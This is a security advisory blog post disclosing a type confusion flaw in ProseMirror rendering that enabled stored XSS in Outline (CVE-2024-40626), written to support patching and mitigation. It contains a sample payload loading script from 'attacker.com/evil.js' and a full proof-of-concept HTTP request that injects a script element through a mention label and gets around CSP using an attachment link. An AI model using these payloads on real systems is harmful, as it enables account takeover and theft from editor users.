Type confusion attacks in ProseMirror editors

Jul 16, 2024

Summary

Calif was recently engaged to audit the open source knowledge base management package Outline. Aside from server side components, we focused on the rather complicated Outline’s editor that is based on the ProseMirror library.

We found a type confusion issue in ProseMirror’s rendering process that leads to a stored Cross-Site Scripting (XSS) vulnerability in Outline (CVE-2024-40626). An authenticated user can create a document containing a malicious JavaScript payload. When other users view this document, the malicious Javascript can execute in the origin of Outline.

While we demonstrated this specific vulnerability in Outline, other ProseMirror editors might be vulnerable to similar type confusion attacks. We recommend Outline users and other ProseMirror editors upgrade to the latest version of Outline and ProseMirror.

We specially thank the Outline and ProseMirror teams for quickly addressing the specific XSS vulnerability and the general type confusion attack vector.

Table of content

Summary

ProseMirror type confusion attacks

Outline case study

Recommendations

Timeline

ProseMirror type confusion attacks

ProseMirror content model

ProseMirror represents content as a JSON node tree, as follows:

{
 "type": "doc",
 "content": [
   {
     "type": "paragraph",
     "attrs": {
       "id": "testid"
     },
     "marks": [
       {
         "type": "strong"
       }
     ],
     "content": [
       {
         "type": "text",
         "text": "test"
       }
     ]
   }
 ]
}

Each node in the tree consists of a type, various attributes, various marks, and child nodes. The root node is a doc type node. The child nodes of each node are defined in the content array.

Editors must define a schema that contains node specs and mark specs, as shown below:

export const schema = new Schema({node_specs, mark_specs})

A simple built-in schema of ProseMirror can be found here.

Node specs and mark specs are almost identical. To save space, we will cover only node specs hereinafter.

Node specs contain the following information:

The node type: Describe the string node name.
The attrs property: Describe the allowlist of node attributes.
The parseDOM property: Parse an HTML DOM element into a JSON node.
The toDOM method: Convert from a JSON node to an HTML DOM element.

Here is an example node spec of heading elements:

node_specs = {

 doc: {
     content: "block+"
 } as NodeSpec,

 heading: {
     attrs: {level: {default: 1}},
     content: "inline*",
     group: "block",
     defining: true,
     parseDOM: [
         {tag: "h1", attrs: {level: 1}},
         {tag: "h2", attrs: {level: 2}},
         {tag: "h3", attrs: {level: 3}},
         {tag: "h4", attrs: {level: 4}},
         {tag: "h5", attrs: {level: 5}},
         {tag: "h6", attrs: {level: 6}}
     ],
     toDOM(node) { 
         return ["h" + node.attrs.level, 0]
     }
 } as NodeSpec

}

ProseMirror rendering

To render a content, ProseMirror serializes the content's JSON node tree to an HTML DOM tree. The detailed process is described in the library guide and the API reference. This task is handled by DOMSerializer, which holds the following two arrays:

nodes: Map node names to the toDOM methods that take a node and return a description of the corresponding HTML DOM element.
marks: Map mark names to the toDOM methods that take a mark and return a description of the corresponding HTML DOM element.

To create the HTML DOM tree, ProseMirror calls DOMSerializer.serializeFragment, passing on the JSON node tree. This method loops recursively over the JSON node tree. For each node, ProseMirror calls DOMSerializer.serializeNodeInner to do the following steps:

Call the toDOM function of the node to get a DOMOutputSpec object.
Call DOMSerializer.renderSpec to convert the DOMOutputSpec object into an HTML DOM element, using the browser’s DOM API, such as createElement, createTextNode, or setAttribute.

The format of the DOMOutputSpec object in step 1 is flexible. It could be one of the following types:

A DOMNode object: DOMSerializer.renderSpec will render the object as-is.
A text string: DOMSerializer.renderSpec will render an HTML DOM text node.
An array specifying a DOM element: DOMSerializer.renderSpec will render an HTML DOM element according to this spec. The array contains the following items:
- The first item: The string HTML tag name.
- The second item: The HTML attribute object.
- The remaining items: Zero or more child DOMOutputSpec objects.

Below are examples of DOMOutputSpec specified as an array:

No child: This object renders to <div class=”test”></div>.
```
[
    "div",
    { class: "test" },
    0
]
```
A text child: This object renders to <div class=”test”>text</div>.
```
[
    "div",
    { class: "test" },
    "text"
]
```
A node child: This object renders to <div class=”test”><img src=”/image/path”></div>.
```
[
    "div",
    { class: "test" },
    [
	 "img",
	 { src: "/image/path" },
	 0
    ]
]
```

Type confusion attacks

The rendering process has two important security considerations:

toDOM takes as input a potentially untrustworthy JSON object, and returns as output a DOMOutputSpec object.
The DOMOutputSpec object can be a text string or an array.

Since a JSON object can contain text strings or arrays, toDOM might just copy the input JSON to its output DOMOutputSpec. This coding pattern might lead to type confusion attacks: toDOM might think it copies text strings, but it actually copies arrays. When DOMSerializer.renderSpec processes the output, instead of creating a text node, it will create an HTML DOM element. When the arrays specify, for example, script DOM elements, this leads to XSS.

Here is an example node spec with a vulnerable toDOM function:

{
  attrs: {
    id: {
      default: null,
    },
    src: {
      default: null,
    },
    title: {},
  },
  toDOM: (node) => [
    "div",
    {
      class: "video",
    },
    [
      "video",
      {
        id: node.attrs.id,
        src: sanitizeUrl(node.attrs.src),
      },
      node.attrs.title,
    ],
  ],
}

In this toDOM method, node.attrs.title is copied verbatim from the JSON input. The developer wants to copy a text string because they intend to output the following HTML:

<div class="video">
	<video id="[id]" src="[src]>
		[title]
	</video>
</div>

However, if we control the JSON content, we can pass node.attrs.title as an array specifying an script element, as follows:

{
  type: "<node name>",
  attrs: {
    id: "blah",
    src: "https://example.com",
    title: [
       "script",
        {
            "src": "https://attacker.com/evil.js"
        },
    ],
  },
}

This will force DOMSerializer.renderSpec to render a script element loading a JavaScript file under our control.

Outline case study

ProseMirror in Outline

Outline uses ProseMirror to implement a generic React editor. The editor is customized to support various use cases:

All node specs and mark specs are defined at the following locations:

Stored XSS in the mention node spec

We discovered that the mention node spec was vulnerable to a type confusion attack, via the node.attrs.label property. The simplified node spec with the vulnerable toDOM code is shown as below:

{
  attrs: {
    label: {},
    id: {},
  },
  toDOM: (node) => [
    "span",
    {
      class: `${node.type.name} use-hover-preview`,
      id: node.attrs.id,
    },
    node.attrs.label,
  ],
}

To exploit this vulnerability, we create a new comment for a document, then update it with the following HTTP request:

POST /api/comments.update HTTP/1.1
Host: docs.calif-pentest.com
Cookie: sessions=%7B%7D; lastSignedIn=saml; accessToken=[accessToken]
Content-Length: 463
Cache-Control: no-cache
Pragma: no-cache
X-Api-Version: 3
Sec-Ch-Ua-Mobile: ?0
X-Editor-Version: 13.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: <https://docs.calif-pentest.com>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: keep-alive

{
  "data": {
    "type": "doc",
    "content": [
      {
        "type": "paragraph",
        "content": [
          {
            "type": "mention",
            "attrs": {
              "type": "user",
              "modelId": "98e9c4e7-d4a7-48c9-98f4-f6c89183398f",
              "actorId": "98e9c4e7-d4a7-48c9-98f4-f6c89183398f",
              "id": "dcca1178-0858-48ca-a6e0-ce1dd47f2d61",
              "label": [
                "script",
                {
                  "src": "<https://docs.calif-pentest.com/api/attachments.redirect?id=8f16c968-a712-4bc7-8ea9-47ab3044502b>"
                },
                "testxss"
              ]
            }
          },
          {
            "type": "text",
            "text": " a"
          }
        ]
      }
    ]
  },
  "id": "28d55628-5e58-4635-9b9c-e8aaeede4df3"
}

Instead of passing a string value for the label property, we passed an array:

[
 "script",
 {
   "src": "<https://docs.calif-pentest.com/api/attachments.redirect?id=8f16c968-a712-4bc7-8ea9-47ab3044502b>"
 },
 "testxss"
]

Due to strict CSP rules, Outline does not load external JavaScript files. We can bypass this by attaching a JavaScript file into a document, and reference it via an attachment link like this:

https://docs.calif-pentest.com/api/attachments.redirect?id=8f16c968-a712-4bc7-8ea9-47ab3044502b

Recommendations

We showed how to exploit a type confusion issue to mount a stored XSS attack in Outline. Due to the complexity of ProseMirror editors, we believe there might be other attacks. To mitigate our specific attack or XSS attacks in general, we recommend implementing the following mitigations.

Mitigate type confusion attacks

We recommend updating the toDOM functions to verify all node attributes. Most node attributes are strings, and should be verified as so.

Sandbox the editor

We recommend re-designing the editor to render content in sandboxed iframes. An editor usually supports a lot of content types, such as math, external embeds, code highlight, Mermaid diagram, etc. These content types pull in many external libraries, which significantly increases the attack surface. Sandboxing the editor should help reduce the impact of any vulnerabilities.

Allow developers to declare stricter schema rules

This recommendation is for ProseMirror maintainers. ProseMirror lacks strict schema declarations for node attributes, especially the attribute type. Editor developers might forget to validate node attributes by themselves. We recommend the ProseMirror team to:

Provide a convenient way to declare allowed types of node attributes.
Enforce a default string type for undeclared node attributes.

Timeline

July 12 2024: We reported the issue to Outline.
July 14 2024: Outline fixed the issue and contacted ProseMirror maintainers. ProseMirror updated a new version and published a security guide.
July 16 2024: Outline released a new version and published an advisory.

Calif

Type confusion attacks in ProseMirror editors

Summary

Table of content

ProseMirror type confusion attacks

ProseMirror content model

ProseMirror rendering

Type confusion attacks

Outline case study

ProseMirror in Outline

Stored XSS in the mention node spec

Recommendations

Mitigate type confusion attacks

Sandbox the editor

Allow developers to declare stricter schema rules

Timeline

Discussion about this post